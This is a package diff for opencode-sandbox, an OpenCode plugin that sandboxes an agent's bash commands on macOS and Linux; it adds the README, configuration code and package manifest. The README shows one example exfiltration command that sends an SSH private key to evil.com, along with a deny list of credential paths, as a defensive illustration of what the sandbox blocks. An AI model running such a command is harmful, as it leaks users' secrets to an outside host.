opencode-sandbox 0.1.0

package/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Iván Sánchez
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -0,0 +1,173 @@
+# opencode-sandbox
+
+An [OpenCode](https://opencode.ai) plugin that sandboxes agent-executed commands using [`@anthropic-ai/sandbox-runtime`](https://github.com/anthropic-experimental/sandbox-runtime).
+
+Every `bash` tool invocation is wrapped with OS-level filesystem and network restrictions — no containers, no VMs, just native OS sandboxing primitives.
+
+| Platform | Mechanism |
+|----------|-----------|
+| **macOS** | `sandbox-exec` (Seatbelt profiles) |
+| **Linux** | `bubblewrap` (namespace isolation) |
+| **Windows** | Not supported (commands pass through) |
+
+## Install
+
+```bash
+# Add to your opencode config
+# opencode.json
+{
+  "plugin": ["opencode-sandbox"]
+}
+```
+
+The plugin is automatically installed from npm when opencode starts.
+
+### Linux prerequisite
+
+Ensure `bubblewrap` is installed:
+
+```bash
+# Debian/Ubuntu
+sudo apt install bubblewrap
+
+# Fedora
+sudo dnf install bubblewrap
+
+# Arch
+sudo pacman -S bubblewrap
+```
+
+## What it does
+
+When the agent runs a bash command like:
+
+```bash
+curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa)
+```
+
+The sandbox blocks it:
+
+```
+cat: /home/user/.ssh/id_rsa: Operation not permitted
+Connection blocked by network allowlist
+```
+
+### Default restrictions
+
+**Filesystem (deny-read)**:
+- `~/.ssh`
+- `~/.gnupg`
+- `~/.aws/credentials`
+- `~/.config/gcloud`
+- `~/.npmrc`
+- `~/.env`
+
+**Filesystem (allow-write)**:
+- Project directory
+- Git worktree
+- `/tmp`
+
+**Network (allow-only)**:
+- `registry.npmjs.org`, `*.npmjs.org`
+- `registry.yarnpkg.com`
+- `pypi.org`, `crates.io`
+- `github.com`, `*.github.com`
+- `gitlab.com`, `*.gitlab.com`
+- `api.openai.com`, `api.anthropic.com`
+- `*.googleapis.com`
+
+Everything else is **blocked by default**.
+
+## Configuration
+
+### Option 1: Config file
+
+```json title=".opencode/sandbox.json"
+{
+  "filesystem": {
+    "denyRead": ["~/.ssh", "~/.aws/credentials"],
+    "allowWrite": [".", "/tmp", "/var/data"],
+    "denyWrite": [".env.production"]
+  },
+  "network": {
+    "allowedDomains": [
+      "registry.npmjs.org",
+      "github.com",
+      "*.github.com",
+      "api.openai.com",
+      "api.anthropic.com",
+      "my-internal-api.company.com"
+    ],
+    "deniedDomains": ["malicious.example.com"]
+  }
+}
+```
+
+### Option 2: Environment variable
+
+```bash
+OPENCODE_SANDBOX_CONFIG='{"filesystem":{"denyRead":["~/.ssh"]},"network":{"allowedDomains":["github.com"]}}' opencode
+```
+
+### Option 3: Disable
+
+```bash
+OPENCODE_DISABLE_SANDBOX=1 opencode
+```
+
+Or in `.opencode/sandbox.json`:
+
+```json
+{
+  "disabled": true
+}
+```
+
+## How it works
+
+The plugin uses two OpenCode hooks:
+
+1. **`tool.execute.before`** — Intercepts bash commands and wraps them with `SandboxManager.wrapWithSandbox()` before execution
+2. **`tool.execute.after`** — Detects sandbox-blocked operations in the output and annotates them for the agent
+
+```
+Agent → bash tool → [plugin wraps command] → sandboxed execution → [plugin annotates blocks] → Agent
+```
+
+### Fail-open design
+
+If anything goes wrong (sandbox init fails, wrapping fails, platform unsupported), commands run normally without sandbox. The plugin never breaks your workflow.
+
+## Local development
+
+```bash
+# Clone and install
+git clone https://github.com/isanchez31/opencode-sandbox-plugin.git
+cd opencode-sandbox-plugin
+bun install
+
+# Run tests
+bun test
+
+# Use as local plugin
+# In your project's .opencode/plugins/sandbox.ts:
+export { SandboxPlugin } from "/path/to/opencode-sandbox/src/index"
+```
+
+## Architecture
+
+```
+src/
+├── index.ts    # Plugin entry — exports SandboxPlugin, hooks into tool.execute.before/after
+└── config.ts   # Config loading (env var, .opencode/sandbox.json) + defaults + resolution
+
+test/
+├── config.test.ts   # Unit tests for config resolution
+└── plugin.test.ts   # Integration tests for plugin hooks
+```
+
+## Related
+
+- [@anthropic-ai/sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime) — The underlying sandbox engine
+- [OpenCode Plugins Docs](https://opencode.ai/docs/plugins) — How to create and use plugins
+- [Claude Code Sandboxing](https://docs.claude.com/en/docs/claude-code/sandboxing) — Anthropic's sandboxing documentation

package/dist/config.d.ts

@@ -0,0 +1,18 @@
+import type { SandboxRuntimeConfig } from "@anthropic-ai/sandbox-runtime";
+export interface SandboxPluginConfig {
+    disabled?: boolean;
+    filesystem?: {
+        denyRead?: string[];
+        allowWrite?: string[];
+        denyWrite?: string[];
+    };
+    network?: {
+        allowedDomains?: string[];
+        deniedDomains?: string[];
+        allowUnixSockets?: string[];
+        allowAllUnixSockets?: boolean;
+        allowLocalBinding?: boolean;
+    };
+}
+export declare function resolveConfig(projectDir: string, worktree: string, user?: SandboxPluginConfig): SandboxRuntimeConfig;
+export declare function loadConfig(projectDir: string): Promise<SandboxPluginConfig>;

package/dist/index.d.ts

@@ -0,0 +1,4 @@
+import type { Plugin } from "@opencode-ai/plugin";
+export type { SandboxPluginConfig } from "./config";
+export declare const SandboxPlugin: Plugin;
+export default SandboxPlugin;

package/dist/index.js

@@ -0,0 +1,123 @@
+// src/index.ts
+import { SandboxManager } from "@anthropic-ai/sandbox-runtime";
+
+// src/config.ts
+import path from "path";
+import os from "os";
+import fs from "fs/promises";
+var DEFAULT_DENY_READ_DIRS = [
+  ".ssh",
+  ".gnupg",
+  ".aws/credentials",
+  ".config/gcloud",
+  ".npmrc",
+  ".env"
+];
+var DEFAULT_ALLOWED_DOMAINS = [
+  "registry.npmjs.org",
+  "*.npmjs.org",
+  "registry.yarnpkg.com",
+  "pypi.org",
+  "*.pypi.org",
+  "crates.io",
+  "*.crates.io",
+  "github.com",
+  "*.github.com",
+  "gitlab.com",
+  "*.gitlab.com",
+  "bitbucket.org",
+  "*.bitbucket.org",
+  "api.openai.com",
+  "api.anthropic.com",
+  "generativelanguage.googleapis.com",
+  "*.googleapis.com"
+];
+function resolveConfig(projectDir, worktree, user) {
+  const homeDir = os.homedir();
+  return {
+    filesystem: {
+      denyRead: user?.filesystem?.denyRead ?? DEFAULT_DENY_READ_DIRS.map((p) => path.join(homeDir, p)),
+      allowWrite: user?.filesystem?.allowWrite ?? [projectDir, worktree, os.tmpdir()].filter(Boolean),
+      denyWrite: user?.filesystem?.denyWrite ?? []
+    },
+    network: {
+      allowedDomains: user?.network?.allowedDomains ?? DEFAULT_ALLOWED_DOMAINS,
+      deniedDomains: user?.network?.deniedDomains ?? [],
+      allowUnixSockets: user?.network?.allowUnixSockets,
+      allowAllUnixSockets: user?.network?.allowAllUnixSockets,
+      allowLocalBinding: user?.network?.allowLocalBinding ?? false
+    }
+  };
+}
+async function loadConfig(projectDir) {
+  const envConfig = process.env["OPENCODE_SANDBOX_CONFIG"];
+  if (envConfig) {
+    try {
+      return JSON.parse(envConfig);
+    } catch {
+      console.warn("[opencode-sandbox] Invalid JSON in OPENCODE_SANDBOX_CONFIG, using defaults");
+    }
+  }
+  const configPath = path.join(projectDir, ".opencode", "sandbox.json");
+  try {
+    const content = await fs.readFile(configPath, "utf-8");
+    return JSON.parse(content);
+  } catch {
+    return {};
+  }
+}
+
+// src/index.ts
+var SandboxPlugin = async ({ directory, worktree }) => {
+  if (process.platform === "win32") {
+    console.warn("[opencode-sandbox] Not supported on Windows — sandbox disabled");
+    return {};
+  }
+  if (process.env["OPENCODE_DISABLE_SANDBOX"] === "1" || process.env["OPENCODE_DISABLE_SANDBOX"] === "true") {
+    return {};
+  }
+  const userConfig = await loadConfig(directory);
+  if (userConfig.disabled)
+    return {};
+  const runtimeConfig = resolveConfig(directory, worktree, userConfig);
+  let sandboxReady = false;
+  try {
+    await SandboxManager.initialize(runtimeConfig);
+    sandboxReady = true;
+    console.log(`[opencode-sandbox] Initialized — writes allowed in: ${runtimeConfig.filesystem?.allowWrite?.join(", ")}`);
+  } catch (err) {
+    console.error("[opencode-sandbox] Failed to initialize:", err instanceof Error ? err.message : err);
+    console.warn("[opencode-sandbox] Commands will run without sandbox");
+  }
+  if (!sandboxReady)
+    return {};
+  return {
+    "tool.execute.before": async (input, output) => {
+      if (input.tool !== "bash")
+        return;
+      const command = output.args?.command;
+      if (typeof command !== "string" || !command)
+        return;
+      try {
+        output.args.command = await SandboxManager.wrapWithSandbox(command);
+      } catch (err) {
+        console.warn("[opencode-sandbox] Failed to wrap command, running unsandboxed:", err instanceof Error ? err.message : err);
+      }
+    },
+    "tool.execute.after": async (input, output) => {
+      if (input.tool !== "bash")
+        return;
+      const text = output.output ?? "";
+      if (text.includes("Operation not permitted") || text.includes("Connection blocked by network allowlist")) {
+        output.output = text + `
+
+⚠️ [opencode-sandbox] Command blocked or partially blocked by sandbox restrictions. ` + "Adjust config in .opencode/sandbox.json or OPENCODE_SANDBOX_CONFIG.";
+      }
+    }
+  };
+};
+var src_default = SandboxPlugin;
+export {
+  src_default as default,
+  SandboxPlugin
+};

package/package.json

@@ -0,0 +1,57 @@
+{
+  "name": "opencode-sandbox",
+  "version": "0.1.0",
+  "description": "OpenCode plugin that sandboxes agent commands using @anthropic-ai/sandbox-runtime (seatbelt on macOS, bubblewrap on Linux)",
+  "type": "module",
+  "main": "dist/index.js",
+  "types": "dist/index.d.ts",
+  "exports": {
+    ".": {
+      "types": "./dist/index.d.ts",
+      "import": "./dist/index.js"
+    }
+  },
+  "files": [
+    "dist",
+    "README.md",
+    "LICENSE"
+  ],
+  "scripts": {
+    "build": "bun build ./src/index.ts --outdir dist --target node --format esm --external @anthropic-ai/sandbox-runtime --external @opencode-ai/plugin && bun x tsc --emitDeclarationOnly --declaration --outDir dist",
+    "dev": "bun run --watch src/index.ts",
+    "test": "bun test",
+    "prepublishOnly": "bun run build"
+  },
+  "keywords": [
+    "opencode",
+    "opencode-plugin",
+    "sandbox",
+    "security",
+    "anthropic",
+    "seatbelt",
+    "bubblewrap",
+    "agent-safety"
+  ],
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/isanchez31/opencode-sandbox-plugin.git"
+  },
+  "homepage": "https://github.com/isanchez31/opencode-sandbox-plugin#readme",
+  "bugs": {
+    "url": "https://github.com/isanchez31/opencode-sandbox-plugin/issues"
+  },
+  "author": "Ivan Sanchez <ivan31.sanchez@gmail.com>",
+  "license": "MIT",
+  "dependencies": {
+    "@anthropic-ai/sandbox-runtime": "^0.0.37"
+  },
+  "peerDependencies": {
+    "@opencode-ai/plugin": ">=1.0.0"
+  },
+  "devDependencies": {
+    "@opencode-ai/plugin": "^1.2.1",
+    "@opencode-ai/sdk": "^1.2.1",
+    "@types/bun": "^1.3.9",
+    "typescript": "^5.8.0"
+  }
+}